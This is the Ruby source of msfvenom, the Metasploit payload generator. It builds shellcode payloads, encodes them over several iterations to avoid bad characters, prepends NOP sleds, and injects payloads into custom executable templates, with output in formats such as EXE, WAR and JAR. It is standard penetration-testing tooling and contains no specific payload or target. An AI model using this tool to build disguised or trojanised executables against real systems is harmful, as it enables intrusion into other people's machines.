#!/usr/bin/env ruby # -*- coding: binary -*- msfbase = __FILE__ while File.symlink?(msfbase) msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase)) end $:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib'))) require 'fastlib' require 'msfenv' $:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB'] require 'rex' require 'msf/ui' require 'msf/base' # Mad payload generation # # @example # venom = MsfVenom.new # # ARGV will be parsed destructively! # venom.parse_args(ARGV) # $stdout.puts venom.generate class MsfVenom class MsfVenomError < StandardError; end class UsageError < MsfVenomError; end class NoTemplateError < MsfVenomError; end class IncompatibleError < MsfVenomError; end Status = "[*] " Error = "[-] " require 'optparse' def initialize(in_stream=$stdin, out_stream=$stdout, err_stream=$stderr, framework=nil) @in = in_stream @out = out_stream @err = err_stream @framework = framework end # Creates a new framework object. # # @note Ignores any previously cached value # @param (see ::Msf::Simple::Framework.create) # @return [Msf::Framework] def init_framework(create_opts={}) create_opts[:module_types] ||= [ ::Msf::MODULE_PAYLOAD, ::Msf::MODULE_ENCODER, ::Msf::MODULE_NOP ] @framework = ::Msf::Simple::Framework.create(create_opts.merge('DisableDatabase' => true)) end # Cached framework object # # @return [Msf::Framework] def framework return @framework if @framework init_framework @framework end # Initialize the options for this run from ARGV # @param args [Array] Usually ARGV. Parsed destructively. # @return [void] # @raise [UsageError] When given invalid options def parse_args(args) @opts = {} @datastore = {} opt = OptionParser.new opt.banner = "Usage: #{$0} [options] " opt.separator('') opt.separator('Options:') opt.on('-p', '--payload ', String, 'Payload to use. Specify a \'-\' or stdin to use custom payloads') do |p| if p == '-' @opts[:payload] = 'stdin' else @opts[:payload] = p end end opt.on('-l', '--list [module_type]', Array, 'List a module type example: payloads, encoders, nops, all') do |l| if l.nil? or l.empty? l = ["all"] end @opts[:list] = l end opt.on('-n', '--nopsled ', Integer, 'Prepend a nopsled of [length] size on to the payload') do |n| @opts[:nopsled] = n.to_i end opt.on('-f', '--format ', String, "Output format (use --help-formats for a list)") do |f| @opts[:format] = f end opt.on('-e', '--encoder [encoder]', String, 'The encoder to use') do |e| @opts[:encode] = true @opts[:encoder] = e end opt.on('-a', '--arch ', String, 'The architecture to use') do |a| @opts[:arch] = a end opt.on('--platform ', String, 'The platform of the payload') do |l| @opts[:platform] = l end opt.on('-s', '--space ', Integer, 'The maximum size of the resulting payload') do |s| @opts[:space] = s end opt.on('-b', '--bad-chars ', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b| @opts[:badchars] = b end opt.on('-i', '--iterations ', Integer, 'The number of times to encode the payload') do |i| @opts[:iterations] = i end opt.on('-c', '--add-code ', String, 'Specify an additional win32 shellcode file to include') do |x| @opts[:addshellcode] = x end opt.on('-x', '--template ', String, 'Specify a custom executable file to use as a template') do |x| @opts[:template] = x end opt.on('-k', '--keep', 'Preserve the template behavior and inject the payload as a new thread') do @opts[:inject] = true end opt.on('-o', '--options', "List the payload's standard options") do @opts[:list_options] = true end opt.on_tail('-h', '--help', 'Show this message') do raise UsageError, "#{opt}" end opt.on_tail('--help-formats', String, "List available formats") do init_framework(:module_types => []) msg = "Executable formats\n" + "\t" + ::Msf::Util::EXE.to_executable_fmt_formats.join(", ") + "\n" + "Transform formats\n" + "\t" + ::Msf::Simple::Buffer.transform_formats.join(", ") raise UsageError, msg end begin opt.parse!(args) rescue OptionParser::InvalidOption => e raise UsageError, "Invalid option\n#{opt}" rescue OptionParser::MissingArgument => e raise UsageError, "Missing required argument for option\n#{opt}" end if @opts.empty? raise UsageError, "No options\n#{opt}" end if args args.each do |x| k,v = x.split('=', 2) @datastore[k.upcase] = v.to_s end end if @opts[:payload].nil? # if no payload option is selected assume we are reading it from stdin @opts[:payload] = "stdin" end end def print_status(msg) @err.puts(Status + msg) end def print_error(msg) @err.puts(Error + msg) end def get_encoders(arch, encoder) encoders = [] if (encoder) encoders << framework.encoders.create(encoder) else framework.encoders.each_module_ranked( 'Arch' => arch ? arch.split(',') : nil) { |name, mod| encoders << mod.new } end encoders end # Read a raw payload from stdin (or whatever IO object we're currently # using as stdin, see {#initialize}) # # @return [String] def payload_stdin @in.binmode payload = @in.read payload end def generate_nops(arch, len, nop_mod=nil, nop_opts={}) nop_opts['BadChars'] ||= '' nop_opts['SaveRegisters'] ||= [ 'esp', 'ebp', 'esi', 'edi' ] if nop_mod nop = framework.nops.create(nop_mod) raw = nop.generate_sled(len, nop_opts) return raw if raw end framework.nops.each_module_ranked('Arch' => arch) do |name, mod| begin nop = framework.nops.create(name) raw = nop.generate_sled(len, nop_opts) return raw if raw rescue end end nil end def dump_payloads init_framework(:module_types => [ ::Msf::MODULE_PAYLOAD ]) tbl = Rex::Ui::Text::Table.new( 'Indent' => 4, 'Header' => "Framework Payloads (#{framework.stats.num_payloads} total)", 'Columns' => [ "Name", "Description" ]) framework.payloads.each_module { |name, mod| tbl << [ name, mod.new.description ] } "\n" + tbl.to_s + "\n" end def dump_encoders(arch = nil) init_framework(:module_types => [ ::Msf::MODULE_ENCODER ]) tbl = Rex::Ui::Text::Table.new( 'Indent' => 4, 'Header' => "Framework Encoders" + ((arch) ? " (architectures: #{arch})" : ""), 'Columns' => [ "Name", "Rank", "Description" ]) cnt = 0 framework.encoders.each_module( 'Arch' => arch ? arch.split(',') : nil) { |name, mod| tbl << [ name, mod.rank_to_s, mod.new.name ] cnt += 1 } (cnt > 0) ? "\n" + tbl.to_s + "\n" : "\nNo compatible encoders found.\n\n" end def dump_nops init_framework(:module_types => [ ::Msf::MODULE_NOP ]) tbl = Rex::Ui::Text::Table.new( 'Indent' => 4, 'Header' => "Framework NOPs (#{framework.stats.num_nops} total)", 'Columns' => [ "Name", "Description" ]) framework.nops.each_module { |name, mod| tbl << [ name, mod.new.description ] } "\n" + tbl.to_s + "\n" end # @return [String] A raw shellcode blob # @return [nil] When commandline options conspire to produce no output def generate_raw_payload if @opts[:payload] == 'stdin' payload_raw = payload_stdin if @opts[:encode] and (@opts[:arch].nil? or @opts[:platform].nil?) print_error("Cannot encode stdin payload without specifying the proper architecture and platform") @opts[:encode] = false end # defaults for stdin payloads users should define them unless @opts[:arch] print_error("Defaulting to x86 architecture for stdin payload, use -a to change") @opts[:arch] = "x86" end unless @opts[:platform] print_error("Defaulting to Windows platform for stdin payload, use --platform to change") @opts[:platform] = ::Msf::Module::PlatformList.transform("Windows") end else payload = framework.payloads.create(@opts[:payload]) if payload.nil? raise UsageError, "Invalid payload: #{@opts[:payload]}" end @opts[:arch] ||= payload.arch[0] # If it's not stdin, we'll already have a PlatformList @opts[:platform] ||= payload.platform payload.datastore.merge! @datastore if @opts[:list_options] print_status("Options for #{payload.fullname}\n\n" + ::Msf::Serializer::ReadableText.dump_module(payload,' ')) return end payload_raw = payload.generate_simple( 'Format' => 'raw', 'Options' => @datastore, 'Encoder' => nil) end payload_raw end # Main dispatch method to do the right thing with the given options. def generate if @opts[:list] @opts[:list].each do |mod| case mod.downcase when "payloads" @err.puts dump_payloads when "encoders" @err.puts dump_encoders(@opts[:arch]) when "nops" @err.puts dump_nops when "all" # Init here so #dump_payloads doesn't create a framework with # only payloads, etc. init_framework @err.puts dump_payloads @err.puts dump_encoders @err.puts dump_nops else raise UsageError, "Invalid module type" end end return end # Normalize the options @opts[:platform] = ::Msf::Module::PlatformList.transform(@opts[:platform]) if @opts[:platform] @opts[:badchars] = Rex::Text.hex_to_raw(@opts[:badchars]) if @opts[:badchars] @opts[:format] ||= 'ruby' @opts[:encoder] ||= nil @opts[:encode] ||= !(@opts[:badchars].nil? or @opts[:badchars].empty?) payload_raw = generate_raw_payload return unless payload_raw if @opts[:template] unless File.exist?(@opts[:template]) raise NoTemplateError, "Template file (#{@opts[:template]}) does not exist" end path = File.dirname(@opts[:template]) altexe = File.basename(@opts[:template]) end exeopts = { :inject => @opts[:inject], :template_path => path, :template => altexe } # If we were given addshellcode for a win32 payload, # create a double-payload; one running in one thread, one running in the other if @opts[:addshellcode] and @opts[:platform].platforms.include?(::Msf::Module::Platform::Windows) and @opts[:arch] == 'x86' payload_raw = ::Msf::Util::EXE.win32_rwx_exec_thread(payload_raw,0,'end') file = ::File.new(@opts[:addshellcode]) file.binmode payload_raw << file.read file.close end if @opts[:encode] done = false encoders = get_encoders(@opts[:arch], @opts[:encoder]) encoders.each do |enc| next if not enc begin break if done enc.datastore.import_options_from_hash(@datastore) skip = false raw = nil @opts[:iterations] ||= 1 1.upto(@opts[:iterations].to_i) do |iteration| begin raw = enc.encode(payload_raw.dup, @opts[:badchars], nil, @opts[:platform]) rescue ::Msf::EncodingError print_error("#{enc.refname} failed: #{$!.class} : #{$!}") skip = true break end if @opts[:space] and @opts[:space] > 0 and raw.length > @opts[:space] print_error("#{enc.refname} created buffer that is too big (#{raw.length})\n\n") skip = true break end print_status("#{enc.refname} succeeded with size #{raw.length} (iteration=#{iteration})\n") payload_raw = raw.dup if iteration == @opts[:iterations] done = true break end end next if skip rescue ::Errno::ENOENT, ::Errno::EINVAL print_error("#{enc.refname} failed: #{$!}") break rescue => e print_error("#{enc.refname} failed: #{e.class} #{e}") e.backtrace.each { |el| @err.puts(el.to_s) } end end end if @opts[:nopsled] nopts = { 'BadChars' => @opts[:badchars] } nops = generate_nops([@opts[:arch]], @opts[:nopsled], nil, nopts) payload_raw = nops + payload_raw end @out.binmode case @opts[:format].downcase # Special-case this to check endianness when "js_be" if Rex::Arch.endian(payload.arch) != ENDIAN_BIG raise IncompatibleError, "Big endian format selected for a non big endian payload" end @out.write ::Msf::Simple::Buffer.transform(payload_raw, @opts[:format]) # Special-case this so we can build a war directly from the payload if # possible when "war" exe = ::Msf::Util::EXE.to_executable_fmt(framework, @opts[:arch], @opts[:platform], payload_raw, @opts[:format], exeopts) if (!exe && payload.respond_to?(:generate_war)) exe = payload.generate_war.pack else exe = ::Msf::Util::EXE.to_jsp_war(exe) end @out.write exe # Same as war, special-case this so we can build a jar directly from the # payload if possible when "java" exe = ::Msf::Util::EXE.to_executable_fmt(framework, @opts[:arch], @opts[:platform], payload_raw, @opts[:format], exeopts) if (!exe && payload.respond_to?(:generate_jar)) exe = payload.generate_jar.pack end if exe @out.write exe else print_error("Could not generate payload format") end when *::Msf::Simple::Buffer.transform_formats buf = ::Msf::Simple::Buffer.transform(payload_raw, @opts[:format]) @out.write buf when *::Msf::Util::EXE.to_executable_fmt_formats exe = ::Msf::Util::EXE.to_executable_fmt(framework, @opts[:arch], @opts[:platform], payload_raw, @opts[:format], exeopts) if exe.nil? raise IncompatibleError, "This format does not support that platform/architecture" end @out.write exe else raise IncompatibleError, "Unsupported format" return end end end if __FILE__ == $0 begin venom = MsfVenom.new venom.parse_args(ARGV) venom.generate rescue MsfVenom::MsfVenomError, Msf::OptionValidateError => e $stderr.puts e.message exit(-1) end end